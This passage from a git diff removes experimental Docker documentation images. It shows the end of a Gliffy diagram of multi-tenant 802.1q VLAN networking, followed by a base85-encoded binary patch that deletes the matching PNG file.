1.3318647887323891,25.3233278955953]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":36.84825915492961,"y":2.637846655791175,"rotation":0.0,"id":244,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":67,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-0.8875219090985048,-1.0551386623167391],[-0.8875219090985048,25.323327895595412]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":7.103278873239435,"y":1.230995106035881,"rotation":0.0,"id":245,"width":1.0000000000000002,"height":25.323327895595277,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":64,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#0b5394","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[1.2752008616871728,0.3517128874389471],[1.2752008616871728,26.73017944535047]],"lockSegments":{},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":0.0,"y":1.5827079934747048,"rotation":0.0,"id":246,"width":44.395492957746484,"height":26.378466557911768,"uid":"com.gliffy.shape.basic.basic_v1.default.rectangle","order":59,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Shape","Shape":{"tid":"com.gliffy.stencil.rectangle.basic_v1","strokeWidth":2.0,"strokeColor":"#6fa8dc","fillColor":"#3d85c6","gradient":true,"dashStyle":null,"dropShadow":false,"state":0,"opacity":1.0,"shadowX":0.0,"shadowY":0.0}},"linkMap":[],"children":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"la
yerId":"9wom3rMkTrb3"},{"x":0.0,"y":37.199347471451986,"rotation":0.0,"id":247,"width":107.40845070422536,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":72,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

container3 - vlan30

10.1.1.2/16

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":65.0,"y":31.199996948242188,"rotation":0.0,"id":253,"width":60.0,"height":14.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":74,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

eth0.30

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":44.49612211422149,"y":17.874999999999943,"rotation":0.0,"id":266,"width":275.00609168449375,"height":15.70000000000006,"uid":"com.gliffy.shape.basic.basic_v1.default.group","order":75,"lockAspectRatio":false,"lockShape":false,"children":[{"x":68.50387788577851,"y":43.12500000000006,"rotation":0.0,"id":258,"width":211.0,"height":31.0,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":9,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-31.924999999999997],[197.00221379871527,-31.925000000000153]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":68.50387788577851,"y":38.55333333333314,"rotation":0.0,"id":262,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":7,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#999999","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":40.7533333333331,"rotation":0.0,"id":261,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":5,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e06666","fillColor":"none","dashStyle":null,"startArrow":0,"end
Arrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":70.50387788577851,"y":42.88666666666643,"rotation":0.0,"id":260,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":3,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#e69138","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":73.50387788577851,"y":43.95333333333309,"rotation":0.0,"id":259,"width":211.0,"height":33.06666666666631,"uid":"com.gliffy.shape.basic.basic_v1.default.line","order":1,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Line","Line":{"strokeWidth":2.0,"strokeColor":"#ffe599","fillColor":"none","dashStyle":null,"startArrow":0,"endArrow":0,"startArrowRotation":"auto","endArrowRotation":"auto","interpolationType":"linear","cornerRadius":null,"controlPath":[[-64.00387788577851,-34.053333333332965],[197.00221379871527,-34.05333333333314]],"lockSegments":{"1":true},"ortho":false}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":248.0,"y":51.19999694824219,"rotation":0.0,"id":207,"width":143.0,"height":70.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":33,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"ou
terPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Network Router (gateway)

vlan10 - 192.168.1.1/24

vlan20 - 172.16.1.1/24

vlan30 - 10.1.1.1/16

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"},{"x":3.0,"y":88.19999694824219,"rotation":0.0,"id":272,"width":77.99999999999999,"height":28.0,"uid":"com.gliffy.shape.basic.basic_v1.default.text","order":76,"lockAspectRatio":false,"lockShape":false,"graphic":{"type":"Text","Text":{"overflow":"none","paddingTop":2,"paddingRight":2,"paddingBottom":2,"paddingLeft":2,"outerPaddingTop":6,"outerPaddingRight":6,"outerPaddingBottom":2,"outerPaddingLeft":6,"type":"fixed","lineTValue":null,"linePerpValue":null,"cardinalityType":null,"html":"

Docker Host

","tid":null,"valign":"middle","vposition":"none","hposition":"none"}},"linkMap":[],"hidden":false,"layerId":"9wom3rMkTrb3"}],"layers":[{"guid":"9wom3rMkTrb3","order":0,"name":"Layer 0","active":true,"locked":false,"visible":true,"nodeIndex":80}],"shapeStyles":{},"lineStyles":{"global":{"stroke":"#e06666","strokeWidth":2,"orthoMode":1}},"textStyles":{"global":{"bold":true,"face":"Arial","size":"12px","color":"#000000"}}},"metadata":{"title":"untitled","revision":0,"exportBorder":false,"loadPosition":"default","libraries":["com.gliffy.libraries.network.network_v4.home","com.gliffy.libraries.network.network_v4.business","com.gliffy.libraries.network.network_v4.rack","com.gliffy.libraries.network.network_v3.home","com.gliffy.libraries.network.network_v3.business","com.gliffy.libraries.network.network_v3.rack"],"lastSerialized":1457586821719,"analyticsProduct":"Confluence"},"embeddedResources":{"index":0,"resources":[]}} \ No newline at end of file diff --git a/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png b/vendor/github.com/docker/docker/experimental/images/multi_tenant_8021q_vlans.png deleted file mode 100644 index a38633cdbc23014364bfc611d650b2a17dc72ae0..0000000000000000000000000000000000000000 GIT binary patch literal 0 HcmV?d00001 literal 17879 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 
